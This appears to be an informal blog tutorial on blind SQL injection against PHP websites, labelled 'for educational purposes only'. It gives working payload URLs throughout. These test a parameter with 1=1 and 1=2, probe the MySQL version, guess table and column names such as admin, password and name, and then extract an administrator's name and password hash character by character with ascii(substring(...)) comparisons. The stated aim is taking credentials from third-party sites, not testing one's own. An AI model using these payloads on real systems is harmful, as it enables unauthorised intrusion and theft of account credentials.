Blind sql Injection. (ascii char)
For educational purposes only!
A vulnerable only to blind sql injection webstite.
Notepad, to store data you collect while injecting.
And loads of loads of spare time.
Finding vulnerable sites: --Kobez expanding vulnerable collection guide!--
Checking vulnerability
Lets start, In what cases do we know if it really is a blind injectable site only?
Wel, you have a site. same as normal injection whit php?if= of pfp?f= of other stuff.. dous not mather.
we want to check if he is vulnerable. so we put and 1=1 behind the id number.
that is always true. ib this case we do not get an error,
now the real test: instead of 1=1 use and 1=2
Code:
www.[site].com/index.php?id=1+and+1=2If we see any text missing or image movement.
or an error like this: invalid id or db_error select * from [site]@localhost call line... blah blah blah.
This means it is vulnerable.
do not forget: and 1=1 means true. page wil return unharmed.
and 1=2 is false. page returns in error or moved content.
Finding the mysql version of the site.
since it is blind sqli... the site will not pop up the version when you put version() no it needs more.
It always needs..
Using the substring(@@version,1,1) is asking if the =4 is true. so we ask database. hey database, is this a version 4 you use.
Database is like No wtf i'm awesome. (he returns false.)
That means instead of =4 put =5
Code:
www.[site].com/index.php?id=1 and substring(@@version,1,1)=5this means its a version 5 database.
gambling columns and tables..
Yeeey people, we moved on to the fun stuff. guessing tables and columns.
since database only sais true or false. we gonna ask our little friend the database everything.
Blind sqli is not that hard. but it sucks as hell!!
how do we guess?
we put something like this: and (select 1 from users limit 0,1)=1
what did i do? wel.
I ask database hey do you in any case have a table name called USERS? database no im awesome. guess again.
database returned false so we try again.
Code:
www.[site].com/index.php?id=1 and (select 1 from admin limit 0,1)=1that means we have a hit yay.
If you are unluckly you need to guess more.
examples: members, tbl_admin, tbladmin, administrator, tbl_users, tblusers, admn
and way more.
God bless us because our journey is not yet on its end.
Columns. we need to guess them to :D
Code:
www.[site].com/index.php?id=1 and (select substring(concat(1,password),1,1) from administrator limit 0,1)=1Wel i askt database hey, do you have a column password in table administrator?
database yes i have one.
he returned true.
we stil need usernames or what else they called it.
Code:
www.[site].com/index.php?id=1 and (select substring(concat(1,username),1,1) from administrator limit 0,1)=1He returned false. now i'm like thinking of killing me.
lets try again..
Code:
www.[site].com/index.php?id=1 and (select substring(concat(1,name),1,1) from administrator limit 0,1)=1I asked database is he for example has Name as a column in table administrators.
database: yes. he returned true.
Hold on Hold on we are not finished yet.
get password and username using ascii char!
since that database hates us. he wont just popup the hash and username like that.
lets suck it out of him he made us mad allready.
by using the ascii char we can do this.
we know we have the column password and the column name. lets use this.
Code:
www.[site].com/index.php?id=1 and ascii(substring((select concat(name,0x3a,password) from admin where userid=2),1,1))>99but first what did i do?
i used the ascii char at start.
then i select name 0x3a password. as shown in my basic tut you should know by now.
and i selected these out of the table admin. i selected user 2 in the database.
Ok that should be clear.
We still need to go higher whit the ascii char.
Code:
www.[site].com/index.php?id=1 and ascii(substring((select concat(name,0x3a,password) from admin where userid=2),1,1))>101it returned true again.
we need to go higher!
Code:
www.[site].com/index.php?id=1 and ascii(substring((select concat(name,0x3a,password) from admin where userid=2),1,1))>102
error.
this means its higher then 101 but not higher then 102 so we know its 102 yay.
the first character is 102 lets check this in an ancii char converter.
or use google and type ascii character 102.
i got letter f as my first character.
finding the next character.
Code:
www.[site].com/index.php?id=1 and ascii(substring((select concat(name,0x3a,password) from admin where userid=2),2,1))>99ook at the changes at the end of the link!!
i changed the 1,1 in 2,1
No comments:
Post a Comment